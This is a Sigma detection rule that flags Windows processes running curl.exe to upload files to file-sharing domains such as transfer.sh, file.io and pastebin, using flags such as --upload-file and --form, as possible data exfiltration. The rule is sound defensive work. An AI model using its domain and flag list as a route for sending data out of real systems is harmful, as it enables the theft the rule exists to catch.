Curl File Upload To File Sharing Websites

 1title: Curl File Upload To File Sharing Websites
 2id: e328cc73-f92a-42fb-b3fa-7c2cffda981a
 3related:
 4    - id: 00bca14a-df4e-4649-9054-3f2aa676bc04
 5      type: derived
 6    - id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
 7      type: similar
 8status: experimental
 9description: Detects usage of curl to upload files to known file sharing domains, which may indicate data exfiltration.
10author: Swachchhanda Shrawan Poudel (Nextron Systems)
11references:
12    - https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/
13date: 2026-03-29
14tags:
15    - attack.exfiltration
16    - attack.t1567.002
17logsource:
18    category: process_creation
19    product: windows
20detection:
21    selection_img:
22        - Image|endswith: '\curl.exe'
23        - OriginalFileName: 'curl.exe'
24    selection_cli_domain:
25        CommandLine|contains:
26            - '0x0.st'
27            - 'bashupload.com'
28            - 'chunk.io'
29            - 'file.io'
30            - 'filebin.net'
31            - 'pastebin'
32            - 'send.firefox.com'
33            - 'temp.sh'
34            - 'transfer.sh'
35            - 'ufile.io'
36            - 'uploadfiles.io'
37            - 'wetransfer.com'
38            - 'x0.at'
39    selection_cli_flags:
40        - CommandLine|contains:
41              - ' --form'
42              - ' --upload-file'
43              - ' --data'
44              - ' -X POST'
45              - ' --request POST '
46        - CommandLine|re:
47              - '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
48              - '\s-sT\s'
49    condition: all of selection_*
50falsepositives:
51    - Legitimate file uploads to these services by administrators or developers
52level: high